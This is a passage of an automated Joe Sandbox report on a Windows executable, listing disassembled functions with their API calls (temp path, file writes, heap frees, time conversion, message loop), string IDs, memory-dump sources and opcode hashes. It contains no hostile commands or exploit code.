                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                              • String ID:
                                                              • API String ID: 1247370737-0
                                                              • Opcode ID: 9a722cad15ef131e0bbf81a310233d33d049ce16b7e58446a02aa6f3f4636a1b
                                                              • Instruction ID: 06ec0d2e5d8c5a1fd53cbec36103ef5e8fcd2f1d38bef14abc1c0579549a781e
                                                              • Opcode Fuzzy Hash: 9a722cad15ef131e0bbf81a310233d33d049ce16b7e58446a02aa6f3f4636a1b
                                                              • Instruction Fuzzy Hash: 604126B1508305AFD710DF65C88496BBBF9FF88355F00892EF996C2210E738E649CB56
                                                              Function 00422210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 00422536
                                                                • Part of subcall function 00424092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004240A5
                                                                • Part of subcall function 004305DA: _wcslen.LIBCMT ref: 004305E0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: __vswprintf_c_l_swprintf_wcslen
                                                              • String ID: ;%u$x%u$xc%u
                                                              • API String ID: 3053425827-2277559157
                                                              • Opcode ID: c469bca1481fab4f894d032962fd49c28781d8270a7f8502715c909da87e7ca9
                                                              • Instruction ID: 77954b0f36901b5d6fa973625efb87ad58042980560568c4236cf90c38c6e63d
                                                              • Opcode Fuzzy Hash: c469bca1481fab4f894d032962fd49c28781d8270a7f8502715c909da87e7ca9
                                                              • Instruction Fuzzy Hash: 8BF15A70704360ABCB24EB25A5D5BBE77956B84304F88056FFC869B343CBACC945C76A
                                                              Function 00439CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: </p>$</style>$<br>$<style>$>
                                                              • API String ID: 176396367-3568243669
                                                              • Opcode ID: 775d6b4ab42fce0c4131511f4834ccdad6eb5833dca7808b54efe4120234eafe
                                                              • Instruction ID: 933bb2b95103f1646b765c2662015378b8de1133052de915a407e67e96e8a5f9
                                                              • Opcode Fuzzy Hash: 775d6b4ab42fce0c4131511f4834ccdad6eb5833dca7808b54efe4120234eafe
                                                              • Instruction Fuzzy Hash: E351D56664532395DB30AA25981377773E0DFA9751F68241BE9C18B3C0FBED8C81826D
                                                              Function 0044F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0044F6CF
                                                              • __fassign.LIBCMT ref: 0044F74A
                                                              • __fassign.LIBCMT ref: 0044F765
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044F78B
                                                              • WriteFile.KERNEL32(?,00000000,00000000,0044FE02,00000000,?,?,?,?,?,?,?,?,?,0044FE02,00000000), ref: 0044F7AA
                                                              • WriteFile.KERNEL32(?,00000000,00000001,0044FE02,00000000,?,?,?,?,?,?,?,?,?,0044FE02,00000000), ref: 0044F7E3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                              • String ID:
                                                              • API String ID: 1324828854-0
                                                              • Opcode ID: 6ce8a6ee88095948035e06a087afd5d55e595b37ccf31d2f3c9573299ef8eefc
                                                              • Instruction ID: 12fbd3a1903ee2fe3ef57a7a2a66ee74283d781bd96f563ae225be910bc0434b
                                                              • Opcode Fuzzy Hash: 6ce8a6ee88095948035e06a087afd5d55e595b37ccf31d2f3c9573299ef8eefc
                                                              • Instruction Fuzzy Hash: C051B2B19002099FDB10CFA8DC85AEEFBF4EF09310F15416BE951E7291D774AA45CBA8
                                                              Function 0043CE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 0043CE9D
                                                                • Part of subcall function 0042B690: _wcslen.LIBCMT ref: 0042B696
                                                              • _swprintf.LIBCMT ref: 0043CED1
                                                                • Part of subcall function 00424092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004240A5
                                                              • SetDlgItemTextW.USER32(?,00000066,0046946A), ref: 0043CEF1
                                                              • _wcschr.LIBVCRUNTIME ref: 0043CF22
                                                              • EndDialog.USER32(?,00000001), ref: 0043CFFE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                              • String ID: %s%s%u
                                                              • API String ID: 689974011-1360425832
                                                              • Opcode ID: 07d5609041236f91a3f7627b045cfa342eaebb3b0462934872b992fd18de487b
                                                              • Instruction ID: 41711484ccc1e1cb6f68282a2fd64b2e749e24ef3243a742055c45d0c76c6139
                                                              • Opcode Fuzzy Hash: 07d5609041236f91a3f7627b045cfa342eaebb3b0462934872b992fd18de487b
                                                              • Instruction Fuzzy Hash: BD4199B1900618AADF259B50DC85EEE77BCDB08345F4050A7F909E7141EF789E44CF6A
                                                              Function 00442900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 00442937
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0044293F
                                                              • _ValidateLocalCookies.LIBCMT ref: 004429C8
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 004429F3
                                                              • _ValidateLocalCookies.LIBCMT ref: 00442A48
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 1170836740-1018135373
                                                              • Opcode ID: ac1c9d444f8cd09b9ced151915adc1e587b25a59830531da572b4f3fac72da54
                                                              • Instruction ID: f60f49b0439caf1c13759e201bab1d38a0cce23a68ff775e2d4636bf7ecc990c
                                                              • Opcode Fuzzy Hash: ac1c9d444f8cd09b9ced151915adc1e587b25a59830531da572b4f3fac72da54
                                                              • Instruction Fuzzy Hash: AD41F974A00208AFDF10DF29C881AAF7BB0AF44315F548157FC14AB352D7B9DA05CB95
                                                              Function 00439955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                              • API String ID: 176396367-3743748572
                                                              • Opcode ID: d425dbf871f5935f17d379497446d9603b9c2149c0d0955f85da25928fcfcb5b
                                                              • Instruction ID: 49eb2d49de694f1a5c19df7ec51540f166b532acbe5adbc8a83ffdb16eb3404b
                                                              • Opcode Fuzzy Hash: d425dbf871f5935f17d379497446d9603b9c2149c0d0955f85da25928fcfcb5b
                                                              • Instruction Fuzzy Hash: 88316C6264438166EA30BF509C42B7B73E4EB84724F60451FF88257380FBECAD8583AD
                                                              Function 0044C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0044C868: _free.LIBCMT ref: 0044C891
                                                              • _free.LIBCMT ref: 0044C8F2
                                                                • Part of subcall function 00448DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0044C896,?,00000000,?,00000000,?,0044C8BD,?,00000007,?,?,0044CCBA,?), ref: 00448DE2
                                                                • Part of subcall function 00448DCC: GetLastError.KERNEL32(?,?,0044C896,?,00000000,?,00000000,?,0044C8BD,?,00000007,?,?,0044CCBA,?,?), ref: 00448DF4
                                                              • _free.LIBCMT ref: 0044C8FD
                                                              • _free.LIBCMT ref: 0044C908
                                                              • _free.LIBCMT ref: 0044C95C
                                                              • _free.LIBCMT ref: 0044C967
                                                              • _free.LIBCMT ref: 0044C972
                                                              • _free.LIBCMT ref: 0044C97D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                              • Instruction ID: b3a318212c5062f189f23809adb25ecec48984d52fb4ef4cfd331af49e1d523c
                                                              • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                              • Instruction Fuzzy Hash: 15114271A82B08A6F560B772CC47FCB7BAC9F10B09F440C1EB29D66092DA69B5058754
                                                              Function 0043E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0043E669,0043E5CC,0043E86D), ref: 0043E605
                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0043E61B
                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0043E630
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                              • API String ID: 667068680-1718035505
                                                              • Opcode ID: 70963bd294787b6a819fdf9ef78b535da0a64812aa9966ca0875c57bce6cee81
                                                              • Instruction ID: cb152600c8634c42ad4400e5286112bbd98a106a4dcfc6e30bd9ff88458fb3f7
                                                              • Opcode Fuzzy Hash: 70963bd294787b6a819fdf9ef78b535da0a64812aa9966ca0875c57bce6cee81
                                                              • Instruction Fuzzy Hash: ADF0C2317823229B0F214E675C9667B62CC6A3D796B50283FE901D33E1EB1CCC566B9D
                                                              Function 00448900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 0044891E
                                                                • Part of subcall function 00448DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0044C896,?,00000000,?,00000000,?,0044C8BD,?,00000007,?,?,0044CCBA,?), ref: 00448DE2
                                                                • Part of subcall function 00448DCC: GetLastError.KERNEL32(?,?,0044C896,?,00000000,?,00000000,?,0044C8BD,?,00000007,?,?,0044CCBA,?,?), ref: 00448DF4
                                                              • _free.LIBCMT ref: 00448930
                                                              • _free.LIBCMT ref: 00448943
                                                              • _free.LIBCMT ref: 00448954
                                                              • _free.LIBCMT ref: 00448965
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID: pE
                                                              • API String ID: 776569668-674470523
                                                              • Opcode ID: 05ab138cf1a50fde9a60993c3fb55653b54eeab66eeeb7dba4006742c9b467fc
                                                              • Instruction ID: 772c1eb9bd9017bf6c00c0d68e1c2c961e426b473ea2c3ccc9e139e193f8d863
                                                              • Opcode Fuzzy Hash: 05ab138cf1a50fde9a60993c3fb55653b54eeab66eeeb7dba4006742c9b467fc
                                                              • Instruction Fuzzy Hash: 88F0D0B18116129B96466F15FE0241D3BA1F724725301096FF514973B2DBBA8A419B8D
                                                              Function 0043146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 004314C2
                                                                • Part of subcall function 0042B146: GetVersionExW.KERNEL32(?), ref: 0042B16B
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004314E6
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00431500
                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00431513
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00431523
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00431533
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                              • String ID:
                                                              • API String ID: 2092733347-0
                                                              • Opcode ID: 0e2c7edfe98459c3374fa654bfc517c7a843e603aa4801a8ea06ad85069ff4fc
                                                              • Instruction ID: f9e52cbc042615e5891ecdcae125770eefe6d4d7a96b3e68afab6f4e64ad7dee
                                                              • Opcode Fuzzy Hash: 0e2c7edfe98459c3374fa654bfc517c7a843e603aa4801a8ea06ad85069ff4fc
                                                              • Instruction Fuzzy Hash: 2731F875108315ABC700DFA8C88499BB7F8FF98755F005A2EF995C3210E734D509CBAA
                                                              Function 00442AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,00442AF1,004402FC,0043FA34), ref: 00442B08
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00442B16
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00442B2F
                                                              • SetLastError.KERNEL32(00000000,00442AF1,004402FC,0043FA34), ref: 00442B81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: 0751685899d5bfa1561e823fa9f29f9e7c780bd8f0308a0e8c896a837014d2ea
                                                              • Instruction ID: 066c20a300f59e892fac32fac8a4d939ebc0c8a3d80e4cca22f8782fcfc5fffb
                                                              • Opcode Fuzzy Hash: 0751685899d5bfa1561e823fa9f29f9e7c780bd8f0308a0e8c896a837014d2ea
                                                              • Instruction Fuzzy Hash: F00124325097112EB6182F767E8592B2F59EB45BBBBE0033FF110511E2EF99EE00910C
                                                              Function 004497E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,00461030,00444674,00461030,?,?,00443F73,00000050,?,00461030,00000200), ref: 004497E9
                                                              • _free.LIBCMT ref: 0044981C
                                                              • _free.LIBCMT ref: 00449844
                                                              • SetLastError.KERNEL32(00000000,?,00461030,00000200), ref: 00449851
                                                              • SetLastError.KERNEL32(00000000,?,00461030,00000200), ref: 0044985D
                                                              • _abort.LIBCMT ref: 00449863
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free$_abort
                                                              • String ID:
                                                              • API String ID: 3160817290-0
                                                              • Opcode ID: a5b94c9974f8478199768b44e1d8cce86bfa67762a14d16ae204a8704c25b19b
                                                              • Instruction ID: b64dd4c20fd7321b5e447523f47e650e2998cba55215519051c9525a81010630
                                                              • Opcode Fuzzy Hash: a5b94c9974f8478199768b44e1d8cce86bfa67762a14d16ae204a8704c25b19b
                                                              • Instruction Fuzzy Hash: F7F0F43515070166F752372A6C0AB1F2A658FE2B7AF31003FF524922D3EE2CCC02616D
                                                              Function 0043DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0043DC47
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0043DC61
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0043DC72
                                                              • TranslateMessage.USER32(?), ref: 0043DC7C
                                                              • DispatchMessageW.USER32(?), ref: 0043DC86
                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0043DC91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 2148572870-0
                                                              • Opcode ID: e8b3268d1161cd59b406e58754840344323f1ff8e4c547dec3ef584cfc814ddf
                                                              • Instruction ID: 7fa27d0fccddbf5a4d71648746517bf72ae46f91c925764f37f38cd884121d04
                                                              • Opcode Fuzzy Hash: e8b3268d1161cd59b406e58754840344323f1ff8e4c547dec3ef584cfc814ddf
                                                              • Instruction Fuzzy Hash: 13F03C72A01219BBCB206FA5EC4CDCF7F6DEF46B92F004521B50AD2055D678D646CBA4
                                                              Function 0043A80C Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0043A699: GetDC.USER32(00000000), ref: 0043A69D
                                                                • Part of subcall function 0043A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0043A6A8
                                                                • Part of subcall function 0043A699: ReleaseDC.USER32(00000000,00000000), ref: 0043A6B3
                                                              • GetObjectW.GDI32(?,00000018,?), ref: 0043A83C
                                                                • Part of subcall function 0043AAC9: GetDC.USER32(00000000), ref: 0043AAD2
                                                                • Part of subcall function 0043AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0043AB01
                                                                • Part of subcall function 0043AAC9: ReleaseDC.USER32(00000000,?), ref: 0043AB99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
